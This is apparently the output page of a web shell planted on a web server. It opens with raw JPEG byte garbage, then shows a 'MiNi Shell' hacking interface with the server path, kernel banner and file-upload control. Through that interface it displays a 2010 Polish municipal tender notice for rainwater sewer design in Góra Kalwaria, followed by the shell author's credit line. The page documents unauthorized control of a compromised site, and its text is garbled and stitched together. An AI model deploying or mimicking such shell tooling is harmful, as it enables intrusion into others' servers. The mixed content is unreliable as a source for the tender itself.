JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100623/163411-N-2010.html

<p class="kh_header"><b>Góra Kalwaria: Budowa kanalizacji deszczowej na terenie byłej Jednostki Wojskowej- dokumentacja</b><br>
<b>Numer ogłoszenia: 163411 - 2010; data zamieszczenia: 23.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Góra Kalwaria , ul. 3 Maja 10, 05-530 Góra Kalwaria, woj. mazowieckie, tel. 0-22/7273414, faks 0-22/7273414.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorakalwaria pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji deszczowej na terenie byłej Jednostki Wojskowej- dokumentacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Wykonanie dokumentacji projektowej dla realizacji zadania: Budowa kanalizacji deszczowej na terenie byłej jednostki wojskowej (w obrębie ulic ks.Sajny, 3-Maja, Dominikańskiej i Wyzwolenia) .

Układ projektowanej sieci kanalizacji deszczowej na terenie miasta ma być opracowany w nawiązaniu do:
ukształtowania terenu
istniejących odbiorników wód deszczowych - kanalizacja deszczowa w ul. Dominikańskiej i 3-Maja
planu zagospodarowania
programu gospodarki deszczowej miasta Góra Kalwaria
      zgodnie z zasadą grawitacyjnego spływu wód deszczowych do odbiornika.
  Istniejące kanały ogólnospławne ewentualnie mogą zostać zaadaptowane (po wyłączeniu ścieków sanitarnych) na kanały deszczowe przy maksymalnym wykorzystaniu ich przepustowości. Docelowymi odbiornikami wód opadowych z terenu objętego projektem będą ewentualnie rzeka Cedron i Wisła, rowy melioracyjne oraz istniejące naturalne cieki powierzchniowe. Z przyczyn niezależnych od Wykonawcy dopuszcza się zmiany trasy kanalizacji, po wcześniejszej akceptacji przez Zamawiającego.

Zakres dokumentacji projektowej obejmuje:
dokumentacja geologiczno-inżynierska w zakresie niezbędnym do późniejszego wykonania wraz  z uzyskaniem  pozwolenia na budowę,
pozwolenie wodno prawne
decyzje o lokalizacji inwestycji celu publicznego, 
decyzje o środowiskowych uwarunkowaniach przedsięwzięcia,
projekt zagospodarowania terenu wraz z kompletem wymaganych uzgodnień, opinii i decyzji,
projekt budowlano -wykonawczy wraz z kompletem wymaganych uzgodnień, opinii i decyzji, w tym z ZGK
część opisowa projektu powinna zawierać pełne obliczenia dobranych rur i urządzeń,
projekt budowlany odtworzenia nawierzchni dróg uzgodniony z zarządcami dróg,
informację dotyczącą bezpieczeństwa i ochrony zdrowia,
w razie potrzeby uzyskanie pisemnych zgód od właścicieli nieruchomości, przez którą przechodzi trasa kolektora (z zaznaczoną trasą przebiegu kanalizacji, nr działki, adresem zamieszkania, nr dowodu osobistego) poświadczone przez przez projektanta, bądź sołtysa.
Uzyskanie map do celów projektowych

Dokumentacja projektowa wykonana będzie w 5egz. w wersji papierowej oraz w formie elektronicznej (płyta CD) w formie plików zapisanych w formacie PDF nie większych niż 10 Mb

1.2. Uzyskanie w imieniu Zamawiającego niezbędnych uzgodnień, opinii i decyzji oraz złożenie kompletnej dokumentacji projektowej z wnioskiem o uzyskanie decyzji o pozwoleniu na budowę do odpowiedniego organu architektoniczno budowlanego.

1.3. Wykonanie dokumentacji kosztorysowej realizacji ww. zadania. Zakres dokumentacji kosztorysowej obejmuje:
Kosztorys nakładczy - przedmiar robót szczegółowy opis robót budowlanych w kolejności technicznego ich wykonania z podaniem ilości i jednostek przedstawionych robót wynikający z dokumentacji projektowej oraz podstaw do ustalania cen jednostkowych robót lub nakładów rzeczowych,
Kosztorysy inwestorskie.

Dokumentacja kosztorysowa wykonana będzie w 2egz. w wersji papierowej oraz w formie elektronicznej (płyta CD) w oparciu o program kosztorysowy umożliwiający odczytanie w programie Norma Pro 4.14 oraz dodatkowo w formie plików zapisanych w formacie PDF. Przedmiary robót powinny być opracowane w oparciu o katalogi nakładów rzeczowych z podaniem kodów CPV.



1.4. Wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych.

Specyfikacje techniczne wykonane będą w 2egz. w wersji papierowej oraz w formie elektronicznej (płyta CD) w oparciu o program Word oraz dodatkowo w formie plików zapisanych w formacie PDF.

2. Wykonana dokumentacja projektowo- kosztorysowa:
powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć, będzie skoordynowana i uzgodniona branżowo;
przyjęte rozwiązania techniczne powinny być uzgodnione z Zamawiającym;
służyć będzie jako opis przedmiotu zamówienia do przetargu na roboty budowlane w oparciu o ustawę Prawo zamówień publicznych oraz realizacji na jej podstawie pełnego zakresu budowlanych niezbędnych do użytkowania obiektu zgodnie z przeznaczeniem;
załączone kserokopie dokumentów powinny być potwierdzone przez projektanta za zgodność z oryginałem; 

3. Dokumentacja projektowo-kosztorysowa powinna być wykonana zgodnie z obowiązującymi przepisami w szczególności:
Ustawą z dnia 7 lipca 2004r. - Prawo budowlane (t.j. Dz.U. z 2006r. nr 156, poz. 1118 z późniejszymi zmianami),
Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004r. nr 202, poz. 2072 z późniejszymi zmianami),
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004r. nr 130, poz. 1389),
Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002r. nr 75, poz. 690 z późniejszymi zmianami),
Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003r. nr 120, poz. 1133).

4. Wykonawca zobowiązany jest do zapoznania się z terenem, na którym projektowana będzie kanalizacja deszczowa.
UWAGA: dokumentację należy wykonać z podziałem w realizacji na 2 etapy oraz w kosztorysach osobno ująć każdy etap.
Opracowanie powinno obejmować w szczególności:
Zakres każdego etapu pod względem finansowym to po ok. 50% całości,  a pod względem rzeczowym według możliwości technicznych i eksploatacyjnych ( korzystanie z ulic przez mieszkańców).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Wykonanie dokumentacji projektowej dla realizacji zadania: Budowa kanalizacji deszczowej na terenie byłej jednostki wojskowej (w obrębie ulic ks.Sajny, 3-Maja, Dominikańskiej i Wyzwolenia) .

Układ projektowanej sieci kanalizacji deszczowej na terenie miasta ma być opracowany w nawiązaniu do:
ukształtowania terenu
istniejących odbiorników wód deszczowych - kanalizacja deszczowa w ul. Dominikańskiej i 3-Maja
planu zagospodarowania
programu gospodarki deszczowej miasta Góra Kalwaria
      zgodnie z zasadą grawitacyjnego spływu wód deszczowych do odbiornika.
  Istniejące kanały ogólnospławne ewentualnie mogą zostać zaadaptowane (po wyłączeniu ścieków sanitarnych) na kanały deszczowe przy maksymalnym wykorzystaniu ich przepustowości. Docelowymi odbiornikami wód opadowych z terenu objętego projektem będą ewentualnie rzeka Cedron i Wisła, rowy melioracyjne oraz istniejące naturalne cieki powierzchniowe. Z przyczyn niezależnych od Wykonawcy dopuszcza się zmiany trasy kanalizacji, po wcześniejszej akceptacji przez Zamawiającego.

Zakres dokumentacji projektowej obejmuje:
dokumentacja geologiczno-inżynierska w zakresie niezbędnym do późniejszego wykonania wraz  z uzyskaniem  pozwolenia na budowę,
pozwolenie wodno prawne
decyzje o lokalizacji inwestycji celu publicznego, 
decyzje o środowiskowych uwarunkowaniach przedsięwzięcia,
projekt zagospodarowania terenu wraz z kompletem wymaganych uzgodnień, opinii i decyzji,
projekt budowlano -wykonawczy wraz z kompletem wymaganych uzgodnień, opinii i decyzji, w tym z ZGK
część opisowa projektu powinna zawierać pełne obliczenia dobranych rur i urządzeń,
projekt budowlany odtworzenia nawierzchni dróg uzgodniony z zarządcami dróg,
informację dotyczącą bezpieczeństwa i ochrony zdrowia,
w razie potrzeby uzyskanie pisemnych zgód od właścicieli nieruchomości, przez którą przechodzi trasa kolektora (z zaznaczoną trasą przebiegu kanalizacji, nr działki, adresem zamieszkania, nr dowodu osobistego) poświadczone przez przez projektanta, bądź sołtysa.
Uzyskanie map do celów projektowych

Dokumentacja projektowa wykonana będzie w 5egz. w wersji papierowej oraz w formie elektronicznej (płyta CD) w formie plików zapisanych w formacie PDF nie większych niż 10 Mb

1.2. Uzyskanie w imieniu Zamawiającego niezbędnych uzgodnień, opinii i decyzji oraz złożenie kompletnej dokumentacji projektowej z wnioskiem o uzyskanie decyzji o pozwoleniu na budowę do odpowiedniego organu architektoniczno budowlanego.

1.3. Wykonanie dokumentacji kosztorysowej realizacji ww. zadania. Zakres dokumentacji kosztorysowej obejmuje:
Kosztorys nakładczy - przedmiar robót szczegółowy opis robót budowlanych w kolejności technicznego ich wykonania z podaniem ilości i jednostek przedstawionych robót wynikający z dokumentacji projektowej oraz podstaw do ustalania cen jednostkowych robót lub nakładów rzeczowych,
Kosztorysy inwestorskie.

Dokumentacja kosztorysowa wykonana będzie w 2egz. w wersji papierowej oraz w formie elektronicznej (płyta CD) w oparciu o program kosztorysowy umożliwiający odczytanie w programie Norma Pro 4.14 oraz dodatkowo w formie plików zapisanych w formacie PDF. Przedmiary robót powinny być opracowane w oparciu o katalogi nakładów rzeczowych z podaniem kodów CPV.



1.4. Wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych.

Specyfikacje techniczne wykonane będą w 2egz. w wersji papierowej oraz w formie elektronicznej (płyta CD) w oparciu o program Word oraz dodatkowo w formie plików zapisanych w formacie PDF.

2. Wykonana dokumentacja projektowo- kosztorysowa:
powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć, będzie skoordynowana i uzgodniona branżowo;
przyjęte rozwiązania techniczne powinny być uzgodnione z Zamawiającym;
służyć będzie jako opis przedmiotu zamówienia do przetargu na roboty budowlane w oparciu o ustawę Prawo zamówień publicznych oraz realizacji na jej podstawie pełnego zakresu budowlanych niezbędnych do użytkowania obiektu zgodnie z przeznaczeniem;
załączone kserokopie dokumentów powinny być potwierdzone przez projektanta za zgodność z oryginałem; 

3. Dokumentacja projektowo-kosztorysowa powinna być wykonana zgodnie z obowiązującymi przepisami w szczególności:
Ustawą z dnia 7 lipca 2004r. - Prawo budowlane (t.j. Dz.U. z 2006r. nr 156, poz. 1118 z późniejszymi zmianami),
Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004r. nr 202, poz. 2072 z późniejszymi zmianami),
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004r. nr 130, poz. 1389),
Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002r. nr 75, poz. 690 z późniejszymi zmianami),
Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003r. nr 120, poz. 1133).

4. Wykonawca zobowiązany jest do zapoznania się z terenem, na którym projektowana będzie kanalizacja deszczowa.
UWAGA: dokumentację należy wykonać z podziałem w realizacji na 2 etapy oraz w kosztorysach osobno ująć każdy etap.
Opracowanie powinno obejmować w szczególności:
Zakres każdego etapu pod względem finansowym to po ok. 50% całości,  a pod względem rzeczowym według możliwości technicznych i eksploatacyjnych ( korzystanie z ulic przez mieszkańców)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.Wykonawca musi wykazać się doświadczeniem zawodowym, polegającym na wykonaniu (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej umowy obejmującej opracowanie projektu budowlanego na budowę deszczówki. Wartość umowy nie może być mniejsza niż 50 000 zł. (brutto).Ocena spełnienia warunków udziału w postępowaniu dokonana będzie zgodnie z formułą spełnia-nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.Wykonawca musi dysponować projektantem w branży sanitarnej, drogowej oraz geologiem.Ocena spełnienia warunków udziału w postępowaniu dokonana będzie zgodnie z formułą spełnia-nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy, wypełniony i podpisany przez Wykonawcę - Załącznik Nr 1 do niniejszej SIWZ.
2.Oświadczenie o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1-3 ustawy - Prawo zamówień publicznych - Załącznik Nr 2 do niniejszej SIWZ. 
3.Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy - Prawo zamówień publicznych - Załącznik nr 3 do niniejszej SIWZ.
4.Pełnomocnictwo zgodne z obowiązującymi przepisami prawa, wystawione dla osoby (osób) upoważnionych do reprezentowania oferenta w toku postępowania o udzielenie zamówienia publicznego, o ile nie wynika ono z przedstawionych dokumentów,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następującym zakresie:
zmiany danych adresowych Zamawiającego lub Wykonawcy;
w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie wszczęcia postępowania przetargowego, a które są niezbędne dla prawidłowej realizacji zamówienia,
W przypadku wystąpienia złych warunków atmosferycznych uniemożliwiających prawidłową realizację zamówienia.
Wszelkie zmiany do umowy wymagają zgody obydwu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorakalwaria.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego /u inspektora ds. zamówień publicznych/ w godzinach urzędowania Zamawiającego zgłaszając telefonicznie takie zapotrzebowanie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 10:00, miejsce: Urząd Miasta i Gminy ul. 3- go Maja 10; 05-530 Góra Kalwaria - w przypadku       przesyłania drogą pocztową; ul. Ratuszowa 1; Biuro Obsługi Mieszkańca (wejście od ul. 3- Maja) - osobiście, kurier..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com